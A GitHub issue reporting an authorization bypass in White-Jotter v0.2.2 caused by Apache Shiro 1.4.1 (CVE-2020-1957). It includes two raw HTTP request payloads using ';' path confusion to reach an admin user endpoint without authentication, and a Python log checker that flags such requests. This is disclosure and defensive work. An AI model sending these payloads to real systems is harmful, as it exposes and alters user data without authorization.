Antabot / White-Jotter

White-Jotter is a front-end/back-end separated project built with Vue + Spring Boot, shipped with a complete set of development tutorials. (A simple CMS developed by Spring Boot and Vue.js with development tutorials)
MIT License

Authorization bypass #159

Open gaogaostone opened 7 hours ago

gaogaostone commented 7 hours ago

White-Jotter v0.2.2 has an authorization bypass vulnerability, allowing unauthorized users to access sensitive system information and even modify critical system data. This vulnerability compromises the confidentiality and integrity of the system.

Code Auditing

Shiro 1.4.1 is used for access control by the project. According to CVE-2020-1957, Apache Shiro before 1.5.2, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass. Therefore, the project is vulnerable to authentication bypass.

Proof of Concept

  1. Visit the URL http://x.x.x.x:8443/api/admin/user to get user information. Without a cookie, it responds with no data. The request and response are as follows.
  2. Add “/xxx/..;/” at the start of the request path, i.e. the new URL is http://x.x.x.x:8443/xxx/..;/api/admin/user. Even without a cookie, it responds with the user information. This bypasses the authentication.
    
    GET /xxx/..;/api/admin/user HTTP/1.1
    Host: x.x.x.x:8443
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
    Accept: application/json, text/plain, */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate, br
    Origin: http://x.x.x.x:8080
    Connection: keep-alive
    Referer: http://x.x.x.x:8080/

![image](https://github.com/user-attachments/assets/7bd77111-4e9c-4202-9253-672b8ca5a6c4)
  3. We can also use this payload to bypass the authentication.

    GET /api/;/admin/user HTTP/1.1
    Host: x.x.x.x:8443
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
    Accept: application/json, text/plain, */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate, br
    Origin: http://x.x.x.x:8080
    Connection: keep-alive
    Referer: http://x.x.x.x:8080/


![image](https://github.com/user-attachments/assets/67dc99bc-a258-4fcb-b362-5fb22ae170c9)
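A defender-side check for the path-handling discrepancy this report relies on, added here as an example; it is not code from the White-Jotter project or from the reporter. It models the pre-1.5.2 Shiro behaviour described in CVE-2020-1957 (path cut at the first `;`) against a simplified servlet-container normalisation and flags access-log entries where the two views of the path disagree; the log lines and both path models are constructed assumptions, not Tomcat's or Shiro's actual code.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from the issue).
SAMPLE_LOG = """\
10.0.0.5 - - "GET /api/admin/user HTTP/1.1" 200
10.0.0.5 - - "GET /xxx/..;/api/admin/user HTTP/1.1" 200
10.0.0.5 - - "GET /api/;/admin/user HTTP/1.1" 200
10.0.0.9 - - "GET /api/article/1 HTTP/1.1" 200
"""

def container_path(raw: str) -> str:
    """Simplified model of how a servlet container resolves a request path:
    drop ';param' from every segment, then collapse '', '.' and '..' segments."""
    out = []
    for seg in unquote(raw.split('?', 1)[0]).split('/'):
        seg = seg.split(';', 1)[0]          # strip per-segment path parameters
        if seg in ('', '.'):
            continue
        if seg == '..':                     # dot-segment climbs one level
            if out:
                out.pop()
            continue
        out.append(seg)
    return '/' + '/'.join(out)

def legacy_shiro_path(raw: str) -> str:
    """Model of the pre-1.5.2 Shiro behaviour from the advisory: the path is
    truncated at the first ';' and matched without further normalisation."""
    path = raw.split('?', 1)[0].split(';', 1)[0]
    return path.rstrip('/') or '/'          # ignore a harmless trailing slash

def is_path_mismatch(raw: str) -> bool:
    """True when the filter chain and the controller would see different paths."""
    return container_path(raw) != legacy_shiro_path(raw)

LOG_RE = re.compile(r'"(?:GET|POST|PUT|DELETE|PATCH) (\S+) HTTP')

def flag_suspicious(log_text: str) -> list:
    """Return (raw, container_view, legacy_shiro_view) for each mismatching request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if m and is_path_mismatch(m.group(1)):
            raw = m.group(1)
            hits.append((raw, container_path(raw), legacy_shiro_path(raw)))
    return hits

if __name__ == "__main__":
    for hit in flag_suspicious(SAMPLE_LOG):
        print("mismatch:", hit)
```

Both payloads from the report are flagged because the container collapses them to `/api/admin/user` while the legacy filter matching sees `/xxx/..` or `/api`; the two benign requests are not.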
CFH-Steven commented 7 hours ago

This is an automatic holiday reply from QQ Mail. Hello, I have received your message, thank you.